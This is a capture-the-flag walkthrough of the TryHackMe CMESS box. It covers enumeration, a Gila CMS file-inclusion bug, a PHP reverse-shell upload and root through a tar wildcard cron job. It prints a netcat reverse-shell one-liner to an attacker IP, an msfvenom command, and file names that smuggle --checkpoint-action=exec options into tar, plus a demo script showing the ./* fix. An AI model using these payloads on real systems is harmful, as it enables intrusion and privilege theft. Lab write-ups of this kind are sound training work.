This is going to be a simple walkthrough of how I did the CMESS box on TryHackMe.com. The privilege escalation demonstrates a really good use of wildcard exploitation. The creator of the box is Optional, and thank you to him for creating an awesome, fun box.
Let’s g3t 4 Sh3ll
First things first, we’re told to add the hostname to our /etc/hosts file.
So, kicking off the box with an nmap scan, we see only ports 80 and 22 open.
Heading over to port 80 we see a simple and pretty empty home page.
Running gobuster on the site gives us quite a few entries back.
As well as directories, we should always enumerate for any subdomains; for that I used a tool called wfuzz.
Here we see that we got a subdomain back, so add this entry to the hosts file as well so we can browse to it.
Upon going to our newfound subdomain we see a conversation between the user andre and support. These are both email addresses and possible usernames we could use later, so make a note of them.
We also see that the support user has reset andre’s password, so let’s take that and see if we can use it anywhere. Looking back at our gobuster output we can see we have an /admin directory. Let’s take a look.
We find a login page that takes an email and a password; we have both, so let’s try them.
And we get logged in. Straight away we see a “Gila CMS version” string, so let’s check whether there are any exploits for it.
Searchsploit shows that there is an LFI (Local File Inclusion) for this version, so let’s take a look using
searchsploit -x <exploit-path>
Let’s see if we can use the last bit of this URL in the CMS we have access to and see if it returns anything.
Append this to the end of our URL.
Okay, great! We now see some kind of directory listing with upload functionality, so let’s see if we can upload a shell.
We manage to upload a payload, which lands in the “assets” directory. Let’s start a listener and then browse to http://cmess.thm/assets/php-reverse-shell.php to get the server to execute the payload.
Awesome, we have a shell as www-data. Looking around we see we can’t get into the andre directory, so our next step is lateral movement to andre.
Lat3ral m0ve to Andre u5er…
Let’s head over to the /tmp directory, grab LinEnum.sh and see what we can do as the www-data user, and maybe find something interesting.
Kicking this off with “./le.sh -t”. The “-t” is for thorough testing; in the results we then see some interesting files lurking about.
This looks interesting, so let’s take a look.
Awesome, we found a password!! Let’s see if we can now SSH to the box as andre 😀
Awesome, let’s grab user.txt while we’re here 🙂
L3ts g3t R00T!
Nice, we got user!! Let’s repeat the LinEnum process and see if we can find anything new. However, this time I’m going to use an “upgraded” version of LinEnum called LinPEAS. This does the same thing as LinEnum and some more…
LinPEAS has a wicked awesome colour scheme for quickly hunting out privilege escalation points, so let’s begin the hunt.
Looking into our results from LinPEAS we see that it’s flagged a cron job that runs as root every 2 minutes.
This job runs a tar command to back up the andre user’s “backup” directory and everything in it.
Because this tar command runs with a bare “*” wildcard, we can do a wildcard exploit. The “*” is expanded by the shell, not by tar, into the names of the files in the directory before tar even starts, so a file whose name begins with “--” reaches tar as a command-line option rather than as a file to archive. GNU tar has --checkpoint=N and --checkpoint-action=exec=<command> options that run a command whenever a checkpoint is reached, and since the cron job runs as root, that command runs as root too. Googling around we find https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/ – these guys do a great job explaining the exploit, better than me at least.
We need to create two empty files carrying those option names, plus a shell.sh payload, inside the /home/andre/backup directory; when the job’s “*” expands, tar sees the file names, treats them as options and executes shell.sh. SUCKAA! First, generate a netcat reverse shell one-liner with msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=ATTACKER-IPADDRESS lport=ATTACKER-PORT R
Heading over to the directory that’s going to be backed up by tar, we see a little note.
Let’s now echo our payload into “shell.sh” and create the two option-named files needed for this exploit.
echo "mkfifo /tmp/obizbxg; nc 10.8.5.236 9009 0</tmp/obizbxg | /bin/bash >/tmp/obizbxg 2>&1; rm /tmp/obizbxg" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
Now we wait for the cron job to run; tar should interpret those file names as options and execute our shell.sh file.
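To see exactly why those three files work, here is an added, runnable re-creation of the attack that is not part of the original write-up. It assumes what the post implies but never shows: that the root cron job changes into /home/andre/backup and runs tar with an unquoted bare “*”, and that tar is GNU tar, which understands --checkpoint and --checkpoint-action. The reverse shell is swapped for a shell.sh that just records the user it ran as, and the scratch directory, archive and marker paths are names chosen for the demo. It goes one step beyond the post by also running the same job with ./* in place of *, which is the usual fix: every expanded name then starts with ./ and cannot be mistaken for an option.

```shell
#!/bin/sh
# Added demonstration, not code from the original write-up or the box.
# Assumptions: the root cron job does "cd <dir> && tar -cf <archive> *"
# (bare, unquoted glob) and tar is GNU tar (--checkpoint support).
set -eu

# Stand-in for the cron job. The shell expands "*" into the file names in $1
# before tar runs, so any name that looks like an option is handed to tar as one.
# A subshell keeps the cd from leaking into the caller.
vulnerable_backup() {
    ( cd "$1" && tar -cf "$2" * )
}

# Same job with the common fix: prefix the glob with ./ so every expanded
# name starts with "./" and can never be parsed as an option.
hardened_backup() {
    ( cd "$1" && tar -cf "$2" ./* )
}

# What the low-privilege user plants in the directory that gets backed up.
# shell.sh stands in for the reverse shell; it only records who ran it.
plant_payload() {
    dir="$1"; marker="$2"
    mkdir -p "$dir"
    printf 'id > %s\n' "$marker" > "$dir/shell.sh"
    # Empty files whose names GNU tar will parse as options. Redirection
    # targets are never option-parsed, so the "--" names need no quoting tricks.
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Show exactly what the shell hands tar: the sorted glob expansion of $1.
expanded_args() {
    ( cd "$1" && printf '%s\n' * )
}

# Run one variant of the job in a scratch directory (constructed for the demo).
# Prints "executed" if shell.sh ran, "not executed" otherwise.
run_job() {
    job="$1"
    work="${TMPDIR:-/tmp}/wildcard-demo.$$"
    rm -rf "$work"
    plant_payload "$work/backup" "$work/pwned.txt"
    "$job" "$work/backup" "$work/backup.tar"
    if [ -s "$work/pwned.txt" ]; then
        result="executed"
    else
        result="not executed"
    fi
    rm -rf "$work"
    printf '%s\n' "$result"
}

run_job vulnerable_backup   # executed (shell.sh ran as whoever ran tar)
run_job hardened_backup     # not executed
```

Run it as an unprivileged user and the first call prints executed, the second not executed; under the hardened job the two option-named files are simply stored as archive members named ./--checkpoint=1 and ./--checkpoint-action=exec=sh shell.sh. The trick also depends on the job using a bare “*” from inside the directory: if the cron line were tar -cf backup.tar /home/andre/backup/*, the expansion would yield absolute paths and nothing would be parsed as an option.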
Woop woop, we got our shell back from the box!
This was a great box that really demonstrated the issues with using wildcards in automated jobs or scripts, and how an attacker can leverage these vulnerabilities to gain higher privileges.